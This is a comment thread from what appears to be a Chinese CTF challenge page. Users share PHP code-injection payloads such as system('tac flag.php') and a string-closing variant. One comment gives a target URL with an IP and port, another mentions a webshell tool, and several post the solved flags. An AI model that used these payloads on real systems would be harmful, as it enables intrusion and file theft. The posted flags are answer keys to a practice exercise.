评分(13)
解题动态
小白修炼日常 攻破了该题 29分钟前
tafeishi 攻破了该题 1小时前
diandianying 攻破了该题 21小时前
amuliang1 攻破了该题 23小时前
恣睢 攻破了该题 1天前
xiaoqixy1 攻破了该题 1天前
lonely_wolf 攻破了该题 1天前
soymilk 攻破了该题 1天前
gedeer 攻破了该题 2天前
ysjy 攻破了该题 2天前
cholmon 攻破了该题 2天前
ling_x 攻破了该题 2天前
Anos 攻破了该题 3天前
15369226763 攻破了该题 3天前
人生1234 攻破了该题 3天前
asasehotaru 攻破了该题 3天前
wwwwander 攻破了该题 4天前
re_void 攻破了该题 4天前
wefyh 攻破了该题 4天前
评论
HK1ng 1年前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
一个姓⎝李⎠的师傅~ 1年前
举报
@Gargantua 因为浏览器遇到 <?php 这种特殊非 html 标准标签时,会触发浏览器自己的容错机制,把 php 代码字符串用灰色字符保留下来再源码中,但是不会当做字符串显示在浏览器上,更不会执行!
Gargantua 1年前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 1年前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 1年前
举报
flag{***}
flag你在哪>︿< 1年前
举报
flag{*********}
八一卜kod 1年前
举报
Too Young Too Simple
evira 1年前
举报
温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell
BaiBaiWin 1年前
举报
http://114.67.175.224:16319/?hello=system('tac flag.php')
1215125613 1年前
举报
flag{1e6d67d7cec2d7d4c373db2605f5f4a1}
Wang_Micro 1年前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}
Rmgcc 1年前
举报
?hello=system('tac flag.php')